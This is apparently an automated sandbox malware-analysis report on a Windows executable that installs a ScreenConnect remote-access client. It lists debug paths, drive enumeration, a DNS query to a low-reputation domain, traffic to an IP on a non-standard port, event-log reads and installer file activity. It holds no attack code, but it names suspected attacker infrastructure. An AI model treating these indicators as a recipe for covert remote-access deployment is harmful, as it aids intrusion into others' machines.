Windows Analysis Report
H36NgltNe7.exe

EXE planting / hijacking vulnerabilities found

Compliance

Source: C:\Users\user\Desktop\H36NgltNe7.exe

EXE: msiexec.exe

PE / OLE file has a valid certificate

Uses 32bit PE files

Source: H36NgltNe7.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: H36NgltNe7.exe

Static PE information: certificate valid

Contains modern PE file flags such as dynamic base (ASLR) or NX

Source: H36NgltNe7.exe

Static PE information: DYNAMIC_BASE, NX_COMPAT, TERMINAL_SERVER_AWARE

Binary contains paths to debug symbols

Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsFileManager\obj\Release\ScreenConnect.WindowsFileManager.pdb source: ScreenConnect.WindowsFileManager.exe.3.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2730222529.0000000002C41000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1597203174.0000000001262000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1598063638.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1597069748.0000000001220000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.dll.3.dr
Source:	Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\DotNetResolver\obj\Debug\DotNetResolver.pdb source: H36NgltNe7.exe
Source:	Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetServiceRunner.pdb source: ScreenConnect.ClientService.exe, 00000008.00000000.1530796871.000000000088D000.00000002.00000001.01000000.0000000C.sdmp, ScreenConnect.ClientService.exe.3.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\ClientInstallerRunner\obj\Release\ScreenConnect.ClientInstallerRunner.pdb source: H36NgltNe7.exe
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb source: H36NgltNe7.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
Source:	Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression.Cab\Microsoft.Deployment.Compression.Cab.pdb source: rundll32.exe, 00000005.00000003.1506976336.0000000004D1E000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdb source: H36NgltNe7.exe
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Windows\obj\Release\net20\ScreenConnect.Windows.pdb/[ source: H36NgltNe7.exe, ScreenConnect.Windows.dll.5.dr, ScreenConnect.Windows.dll.3.dr
Source:	Binary string: C:\build\work\eca3d12b\wix3\build\ship\x86\wixca.pdb source: H36NgltNe7.exe, 6f527a.rbs.3.dr, 6f5279.msi.3.dr, 6f527b.msi.3.dr, MSI576D.tmp.3.dr, MSI5509.tmp.3.dr, MSI5529.tmp.3.dr, setup.msi.0.dr
Source:	Binary string: C:\build\work\eca3d12b\wix3\build\obj\ship\x86\Compression\Microsoft.Deployment.Compression.pdb source: rundll32.exe, 00000005.00000003.1506976336.0000000004CAD000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.dll.5.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsBackstageShell\obj\Release\ScreenConnect.WindowsBackstageShell.pdb source: ScreenConnect.WindowsBackstageShell.exe.3.dr
Source:	Binary string: screenconnect_windows_credential_provider.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.2745938752.0000000002727000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1604851765.0000000012D60000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsClient\obj\Release\ScreenConnect.WindowsClient.pdb source: ScreenConnect.WindowsClient.exe, 00000009.00000000.1546068019.0000000000792000.00000002.00000001.01000000.00000011.sdmp, ScreenConnect.WindowsClient.exe.3.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\InstallerActions\obj\Release\ScreenConnect.InstallerActions.pdb source: ScreenConnect.InstallerActions.dll.5.dr
Source:	Binary string: E:\delivery\Dev\wix37_public\build\ship\x86\SfxCA.pdb source: H36NgltNe7.exe, 6f5279.msi.3.dr, 6f527b.msi.3.dr, MSI4C3F.tmp.2.dr, setup.msi.0.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Client\obj\Release\net20\ScreenConnect.Client.pdb source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1596802211.00000000011E2000.00000002.00000001.01000000.00000010.sdmp, ScreenConnect.Client.dll.3.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\ClientService\obj\Release\ScreenConnect.ClientService.pdbU! source: ScreenConnect.WindowsClient.exe, 00000009.00000002.2730222529.0000000002C41000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1597203174.0000000001262000.00000002.00000001.01000000.0000000D.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1598063638.0000000002D51000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1597069748.0000000001220000.00000004.08000000.00040000.00000000.sdmp, ScreenConnect.ClientService.dll.3.dr
Source:	Binary string: C:\builds\cc\cwcontrol\Product\WindowsInstaller\obj\Release\net20\ScreenConnect.WindowsInstaller.pdbI source: H36NgltNe7.exe
Source:	Binary string: C:\Compile\screenconnect\Product\WindowsAuthenticationPackage\bin\Release\ScreenConnect.WindowsAuthenticationPackage.pdb source: ScreenConnect.ClientService.exe, 00000008.00000002.2745938752.0000000002727000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1604851765.0000000012D60000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr
Source:	Binary string: screenconnect_windows_credential_provider.pdb' source: ScreenConnect.ClientService.exe, 00000008.00000002.2745938752.0000000002727000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1604851765.0000000012D60000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsCredentialProvider.dll.3.dr
Source:	Binary string: C:\Users\jmorgan\Source\cwcontrol\Custom\DotNetRunner\Release\DotNetRunner.pdb source: H36NgltNe7.exe
Source:	Binary string: C:\builds\cc\cwcontrol\Product\Core\obj\Release\net20\ScreenConnect.Core.pdb source: H36NgltNe7.exe, ScreenConnect.Core.dll.5.dr, ScreenConnect.Core.dll.3.dr

Spreading

Checks for available system drives (often done to infect USB drives)

Source: C:\Windows\System32\msiexec.exe	File opened: z:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: x:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: v:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: t:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: r:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: p:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: n:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: l:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: j:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: h:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: f:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: b:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: y:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: w:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: u:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: s:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: q:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: o:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: m:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: k:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: i:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: g:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: e:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: c:	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File opened: a:	Jump to behavior

Networking

Enables network access during safeboot for specific services

Source: C:\Windows\System32\msiexec.exe

Registry value created: NULL Service

Performs DNS queries to domains with low reputation

Source:

DNS query: lokistorage.xyz

Detected TCP or UDP traffic on non-standard ports

Source: global traffic

TCP traffic: 192.168.2.8:49707 -> 95.164.16.15:8041

Internet Provider seen in connection with other malware

Source: Joe Sandbox View

ASN Name: NASSIST-ASGI NASSIST-ASGI

Suricata IDS alerts with low severity for network traffic

Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.8:63743
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 4.245.163.56:443 -> 192.168.2.8:49708

Source: unknown

UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

DNS traffic detected: DNS query: lokistorage.xyz

Source: H36NgltNe7.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0E
Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1604851765.0000000012D60000.00000004.00000800.00020000.00000000.sdmp, H36NgltNe7.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crt0
Source: H36NgltNe7.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crt0
Source: H36NgltNe7.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.dr	String found in binary or memory: http://cacerts.digicert.com/DigiCertTrustedRootG4.crt0C
Source: H36NgltNe7.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0
Source: H36NgltNe7.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0S
Source: H36NgltNe7.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedG4RSA4096SHA256TimeStampingCA.crl0
Source: ScreenConnect.WindowsBackstageShell.exe.3.dr	String found in binary or memory: http://crl3.digicert.com/DigiCertTrustedRootG4.crl0
Source: ScreenConnect.WindowsClient.exe, 0000000A.00000002.1604851765.0000000012D60000.00000004.00000800.00020000.00000000.sdmp, H36NgltNe7.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.dr	String found in binary or memory: http://crl4.digicert.com/DigiCertTrustedG4CodeSigningRSA4096SHA3842021CA1.crl0
Source: H36NgltNe7.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.dr	String found in binary or memory: http://ocsp.digicert.com0
Source: H36NgltNe7.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.dr	String found in binary or memory: http://ocsp.digicert.com0A
Source: H36NgltNe7.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.dr	String found in binary or memory: http://ocsp.digicert.com0C
Source: H36NgltNe7.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.dr	String found in binary or memory: http://ocsp.digicert.com0X
Source: ScreenConnect.ClientService.exe, 00000008.00000002.2731727368.000000000198B000.00000004.00000800.00020000.00000000.sdmp, ScreenConnect.WindowsClient.exe, 0000000A.00000002.1598063638.00000000031DA000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: rundll32.exe, 00000005.00000003.1506976336.0000000004D1E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1506976336.0000000004CAD000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr	String found in binary or memory: http://wixtoolset.org/Whttp://wixtoolset.org/telemetry/v
Source: rundll32.exe, 00000005.00000003.1506976336.0000000004D1E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1506976336.0000000004CAD000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr	String found in binary or memory: http://wixtoolset.org/news/
Source: rundll32.exe, 00000005.00000003.1506976336.0000000004D1E000.00000004.00000020.00020000.00000000.sdmp, rundll32.exe, 00000005.00000003.1506976336.0000000004CAD000.00000004.00000020.00020000.00000000.sdmp, Microsoft.Deployment.Compression.Cab.dll.5.dr, Microsoft.Deployment.Compression.dll.5.dr	String found in binary or memory: http://wixtoolset.org/releases/
Source: H36NgltNe7.exe, ScreenConnect.WindowsCredentialProvider.dll.3.dr, ScreenConnect.ClientService.exe.3.dr, ScreenConnect.WindowsFileManager.exe.3.dr, ScreenConnect.WindowsAuthenticationPackage.dll.3.dr, ScreenConnect.WindowsClient.exe.3.dr, ScreenConnect.WindowsBackstageShell.exe.3.dr	String found in binary or memory: http://www.digicert.com/CPS0
Source: ScreenConnect.WindowsCredentialProvider.dll.3.dr	String found in binary or memory: https://docs.rs/getrandom#nodejs-es-module-support
Source: ScreenConnect.Core.dll.3.dr	String found in binary or memory: https://feedback.screenconnect.com/Feedback.axd

Spam, unwanted Advertisements and Ransom Demands

Reads the Security eventlog

Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\Security	Jump to behavior

Reads the System eventlog

Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Key opened: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\EventLog\System	Jump to behavior

System Summary

Detected potential unwanted application

Source: H36NgltNe7.exe

PE Siganture Subject Chain: CN="Connectwise, LLC", O="Connectwise, LLC", L=Tampa, S=Florida, C=US

Contains functionality to launch a process as a different user

Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe

Code function: 8_2_052C0560 CreateProcessAsUserW,

8_2_052C0560

Creates files inside the system directory

Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\6f5279.msi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\inprogressinstallinfo.ipi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\SourceHash{7A085B4C-0189-0C8C-1652-69D0030FEB14}	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI5509.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI5529.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\MSI576D.tmp	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\6f527b.msi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\6f527b.msi	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\{7A085B4C-0189-0C8C-1652-69D0030FEB14}	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File created: C:\Windows\Installer\{7A085B4C-0189-0C8C-1652-69D0030FEB14}\DefaultIcon	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File created: C:\Windows\Installer\wix{7A085B4C-0189-0C8C-1652-69D0030FEB14}.SchedServiceConfig.rmi	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (20ae101cef0f1acf)	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (20ae101cef0f1acf)\k0xkl0r0.tmp	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	File created: C:\Windows\SysWOW64\config\systemprofile\AppData\Local\ScreenConnect Client (20ae101cef0f1acf)\k0xkl0r0.newcfg	Jump to behavior
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	File created: C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\ScreenConnect.WindowsClient.exe.log	Jump to behavior

Deletes files inside the Windows folder

Source: C:\Windows\System32\msiexec.exe

File deleted: C:\Windows\Installer\MSI5529.tmp

Detected potential crypto function

Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.ClientService.exe	Code function: 8_2_014ED488	8_2_014ED488
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFB4ACF6D1D	9_2_00007FFB4ACF6D1D
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 9_2_00007FFB4ACF5CB6	9_2_00007FFB4ACF5CB6
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 10_2_00007FFB4A9F703D	10_2_00007FFB4A9F703D
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 10_2_00007FFB4AD0DC76	10_2_00007FFB4AD0DC76
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 10_2_00007FFB4AD0296C	10_2_00007FFB4AD0296C
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 10_2_00007FFB4AD05966	10_2_00007FFB4AD05966
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 10_2_00007FFB4AD0EA22	10_2_00007FFB4AD0EA22
Source: C:\Program Files (x86)\ScreenConnect Client (20ae101cef0f1acf)\ScreenConnect.WindowsClient.exe	Code function: 10_2_00007FFB4AD05BA4	10_2_00007FFB4AD05BA4

PE file contains executable resources (Code or Archives)

Source: H36NgltNe7.exe	Static PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Source: H36NgltNe7.exe	Static PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Source: H36NgltNe7.exe	Static PE information: Resource name: FILES type: PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Source: H36NgltNe7.exe	Static PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Source: H36NgltNe7.exe	Static PE information: Resource name: FILES type: PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows

Sample file is different than original file name gathered from version info

Source: H36NgltNe7.exe, 00000000.00000002.1492823216.00000000050E0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenamelibwebp.dllB vs H36NgltNe7.exe
Source: H36NgltNe7.exe, 00000000.00000002.1492823216.00000000050E0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenamezlib.dll2 vs H36NgltNe7.exe
Source: H36NgltNe7.exe, 00000000.00000002.1492823216.00000000050E0000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs H36NgltNe7.exe
Source: H36NgltNe7.exe, 00000000.00000002.1486309822.0000000002860000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameDotNetResolver.exe4 vs H36NgltNe7.exe
Source: H36NgltNe7.exe, 00000000.00000002.1493878183.000000000549B000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs H36NgltNe7.exe
Source: H36NgltNe7.exe, 00000000.00000002.1493878183.000000000549B000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameSfxCA.dllL vs H36NgltNe7.exe
Source: H36NgltNe7.exe, 00000000.00000002.1493878183.000000000549B000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenamewixca.dll\ vs H36NgltNe7.exe
Source: H36NgltNe7.exe, 00000000.00000002.1493878183.000000000549B000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs H36NgltNe7.exe
Source: H36NgltNe7.exe, 00000000.00000002.1504107631.00000000076F1000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenamewixca.dll\ vs H36NgltNe7.exe
Source: H36NgltNe7.exe, 00000000.00000000.1464550811.0000000000A76000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs H36NgltNe7.exe
Source: H36NgltNe7.exe, 00000000.00000000.1464550811.0000000000A76000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameSfxCA.dllL vs H36NgltNe7.exe
Source: H36NgltNe7.exe, 00000000.00000000.1464550811.0000000000A76000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamewixca.dll\ vs H36NgltNe7.exe
Source: H36NgltNe7.exe, 00000000.00000000.1464550811.0000000000A76000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameScreenConnect.ClientInstallerRunner.exe< vs H36NgltNe7.exe
Source: H36NgltNe7.exe, 00000000.00000000.1464550811.0000000000A76000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameDotNetResolver.exe4 vs H36NgltNe7.exe
Source: H36NgltNe7.exe, 00000000.00000002.1504107631.0000000007617000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameScreenConnect.InstallerActions.dll< vs H36NgltNe7.exe
Source: H36NgltNe7.exe, 00000000.00000002.1504107631.0000000007617000.00000004.00000800.00020000.00000000.sdmp	Binary or memory string: OriginalFilenameSfxCA.dllL vs H36NgltNe7.exe
Source: H36NgltNe7.exe, 00000000.00000002.1492545938.0000000005050000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameScreenConnect.Core.dll< vs H36NgltNe7.exe
Source: H36NgltNe7.exe, 00000000.00000002.1492360270.0000000004F90000.00000004.08000000.00040000.00000000.sdmp	Binary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs H36NgltNe7.exe
Source: H36NgltNe7.exe, 00000000.00000000.1464550811.0000000000676000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameScreenConnect.Core.dll< vs H36NgltNe7.exe
Source: H36NgltNe7.exe, 00000000.00000000.1464550811.0000000000676000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamelibwebp.dllB vs H36NgltNe7.exe
Source: H36NgltNe7.exe, 00000000.00000000.1464550811.0000000000676000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenamezlib.dll2 vs H36NgltNe7.exe
Source: H36NgltNe7.exe, 00000000.00000000.1464550811.0000000000676000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs H36NgltNe7.exe
Source: H36NgltNe7.exe, 00000000.00000000.1464550811.0000000000676000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: OriginalFilenameScreenConnect.WindowsInstaller.dll< vs H36NgltNe7.exe
Source: H36NgltNe7.exe	Binary or memory string: OriginalFilenameScreenConnect.Core.dll< vs H36NgltNe7.exe
Source: H36NgltNe7.exe	Binary or memory string: OriginalFilenamelibwebp.dllB vs H36NgltNe7.exe
Source: H36NgltNe7.exe	Binary or memory string: OriginalFilenamezlib.dll2 vs H36NgltNe7.exe
Source: H36NgltNe7.exe	Binary or memory string: OriginalFilenameScreenConnect.Windows.dll< vs H36NgltNe7.exe
